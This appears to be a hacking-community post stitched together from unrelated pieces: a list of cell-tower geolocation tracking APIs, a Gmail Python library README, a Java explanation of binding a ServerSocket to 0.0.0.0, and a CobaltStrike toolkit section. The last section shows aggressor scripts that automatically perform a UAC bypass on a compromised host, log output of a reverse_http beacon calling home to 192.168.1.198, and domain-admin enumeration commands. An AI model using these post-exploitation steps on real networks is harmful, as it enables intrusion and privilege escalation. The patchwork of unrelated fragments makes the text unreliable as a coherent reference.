UNDERCODE COMMUNITY
FOR HACK ANY GAME, use for offline games (legal)
API FOR TRACKING
Currently, the following APIs are implemented:
- cellocation: [Cellocation.com API (China)](http://www.cellocation.com/interfac/)
- gpsspg: [GPSspg.com API (China)](http://www.gpsspg.com/api/bs/)
- google: [Google Geolocation API](https://developers.google.com/maps/documentation/geolocation/intro)
- haoservice: [HaoService.com API (China)](http://www.haoservice.com/docs/1)
- mozilla: [Mozilla Geolocation API](https://location.services.mozilla.com/api)
- mylnikov: [Mylnikov Geolocation API](https://www.mylnikov.org/archives/1059)
- opencellid: [OpenCellID API](http://opencellid.org/)
- unwiredlabs: [UnwiredLabs Location API](https://unwiredlabs.com/)
- yandex: [Yandex Geolocation API (Russian)](https://tech.yandex.ru/locator/doc/dg/api/geolocation-api_json-docpage/)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
A Pythonic interface to Google's GMail, with all the tools you'll need. Search, read and send multipart emails, archive, mark as read/unread, delete emails, and manage labels.
- Search emails
- Read emails
- Emails: label, archive, delete, mark as read/unread/spam, star
- Manage labels
INSTALLATION & RUN:
1) git clone https://github.com/charlierguo/gmail.git
2) To start, import the gmail library.

    import gmail
Authenticating gmail sessions
To easily get up and running:

    import gmail
    # Take username and password from a prompt or secret store rather than hard-coding them.
    g = gmail.login(username, password)

This automatically logs you into a GMail account. It is a shortcut for creating a new Gmail object:

    from gmail import Gmail
    g = Gmail()
    g.login(username, password)
    # play with your gmail...
    g.logout()

You can also check whether you are logged in at any time:

    g = gmail.login(username, password)
    g.logged_in # Should be True, AuthenticationError if login fails

OAuth authentication
If you have already received an OAuth2 access token from Google for a given user, you can easily log the user in. (Because OAuth 1.0 usage was deprecated in April 2012, this library does not currently support it.)

    # Use a separate name so the session object does not shadow the gmail module.
    g = gmail.authenticate(username, access_token)
Filtering emails
Get all messages in your inbox:

    g.inbox().mail()

Get messages that fit some criteria:

    import datetime
    g.inbox().mail(after=datetime.date(2013, 6, 18), before=datetime.date(2013, 8, 3))
    g.inbox().mail(on=datetime.date(2009, 1, 1))
    g.inbox().mail(sender="myfriend@gmail.com") # "from" is reserved, use "fr" or "sender"
    g.inbox().mail(to="directlytome@gmail.com")

Combine flags and options:

    g.inbox().mail(unread=True, sender="myboss@gmail.com")

Browsing labeled emails is similar to working with your inbox:

    g.mailbox('Urgent').mail()

Every message in a conversation/thread will come as a separate message:

    g.inbox().mail(unread=True, before=datetime.date(2013, 8, 3), sender="myboss@gmail.com")
Working with emails
Important: calls to mail() return a list of empty email messages (with unique IDs). To work with labels, headers, subjects, and bodies, call fetch() on an individual message. You can also call mail() with prefetch=True, which fetches the bodies automatically.

    unread = g.inbox().mail(unread=True)
    print(unread[0].body)
    # None
    unread[0].fetch()
    print(unread[0].body)
    # Dear ...,

Mark news past a certain date as read and archive it:

    emails = g.inbox().mail(before=datetime.date(2013, 4, 18), sender="news@nbcnews.com")
    for email in emails:
        email.read() # can also unread(), delete(), spam(), or star()
        email.archive()
When a server is started during development, local tests usually specify only the port; in the actual environment, the IP address to bind to must be specified as well.
A server sometimes has more than one network card, and our system must communicate through a specified IP and port, so the IP and port the server uses should be defined in a configuration file.
So in the usual test, where no IP is specified, what address is the ServerSocket bound to?
In this case the server binds the port to 0.0.0.0, that is, to all of the host's IP addresses, so it receives requests on every one of them. As for what 0.0.0.0 is, I won't talk about it here.
The following test program shows what is going on:

    package test;

    import java.net.InetSocketAddress;
    import java.net.ServerSocket;
    import java.net.Socket;

    public class Test {
        public static void main(String[] args) throws Exception {
            SocketClient client = new SocketClient();
            new Thread(client).start();
            ServerSocket serverSocket = new ServerSocket();
            // Port only: the socket is bound to 0.0.0.0, i.e. every local address.
            serverSocket.bind(new InetSocketAddress(8888));
            // Alternatives: bind to one specific address instead.
            // serverSocket.bind(new InetSocketAddress("127.0.0.1",8888));
            // serverSocket.bind(new InetSocketAddress("192.168.1.100",8888));
            System.out.println(serverSocket.toString());
            serverSocket.accept();
        }
    }

    class SocketClient implements Runnable {
        public void run() {
            try {
                // Give the server time to bind before connecting.
                Thread.sleep(2000);
                try {
                    Socket socket = new Socket("127.0.0.1", 8888);
                    System.out.println("127.0.0.1 " + socket.toString());
                } catch (Exception e) {
                    // Connection via the loopback address failed.
                    System.err.println("127.0.0.1");
                }
                try {
                    Socket socket = new Socket("192.168.1.100", 8888);
                    System.out.println("192.168.1.100 " + socket.toString());
                } catch (Exception e) {
                    // Connection via the LAN address failed.
                    System.err.println("192.168.1.100");
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
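
An added example, not part of the original post: one way to take the bind address and port from a configuration file, as the post recommends, so that listening on 0.0.0.0 becomes an explicit choice instead of the default. The class name ConfiguredBind and the property names bind.host, bind.port and bind.allowWildcard are assumptions made for this illustration.

```java
import java.io.IOException;
import java.io.StringReader;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.util.Properties;

public class ConfiguredBind {
    // Constructed sample configuration; a real deployment would load this
    // from a properties file (file and key names are hypothetical).
    static final String SAMPLE =
            "bind.host=127.0.0.1\nbind.port=8888\nbind.allowWildcard=false\n";

    // Turns the configuration into a bind address, refusing to fall back
    // silently to the wildcard address 0.0.0.0.
    static InetSocketAddress resolve(Properties p) throws IOException {
        String host = p.getProperty("bind.host", "").trim();
        int port = Integer.parseInt(p.getProperty("bind.port", "0").trim());
        boolean allowWildcard =
                Boolean.parseBoolean(p.getProperty("bind.allowWildcard", "false"));
        if (host.isEmpty()) {
            throw new IOException("bind.host is not set; refusing to bind to 0.0.0.0");
        }
        InetAddress addr = InetAddress.getByName(host);
        if (addr.isAnyLocalAddress() && !allowWildcard) {
            throw new IOException("wildcard bind requires bind.allowWildcard=true");
        }
        return new InetSocketAddress(addr, port);
    }

    public static void main(String[] args) throws Exception {
        Properties p = new Properties();
        p.load(new StringReader(SAMPLE));
        try (ServerSocket server = new ServerSocket()) {
            server.bind(resolve(p));
            // Report the address the socket is actually bound to.
            System.out.println("listening on " + server.getLocalSocketAddress());
        }
        // The same check rejects an all-interfaces bind that was not opted into.
        p.setProperty("bind.host", "0.0.0.0");
        try {
            resolve(p);
        } catch (IOException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```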
CobaltStrike toolkit:
Currently uses a PowerShell-based check, combined with an aggressor script, to check the initial agent user name, while using .NET 3.5 to perform Domain Group enumeration (PowerShell 2+ safe). This allows alerting on DA-level beacons during a pen test.
- Places a note on the beacon
- Logs to the Event Log for the team to see the PID
- Uses a pop-up to alert the operator
INSTALLATION & RUN:
1) clone https://github.com/killswitch-GUI/CobaltStrike-ToolKit
2) Run this with all the other scripts:

    aggressor> load Initial-LAdminCheck.cna
    [+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna

When an initial beacon comes in:

    aggressor> reload Initial-LAdminCheck.cna
    [+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna

If it returns as a Local Admin, it will perform Bypass UAC:

    [*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.1.198:80) in a high integrity process
    [+] host called home, sent: 76304 bytes

3) Load up the script:

    aggressor> load DA-Watch.cna
    [+] Reload /root/Tools/CobaltStrike-ToolKit/DA-Watch.cna

Run this command and it will populate the known DA list:

    shell net group /domain "Domain Admins"

uaddDA - Command
Adds a user to the DA list
uremDA - Command
Removes a user from the DA list
ulistDA - Command
Prints a list of the current DAs to the console
uhookOn
Sets the hook to follow beacon output to "On". This will watch all output for Shell net group...
uhookOff
Turns off the watch hook and sets the follow beacon output to off.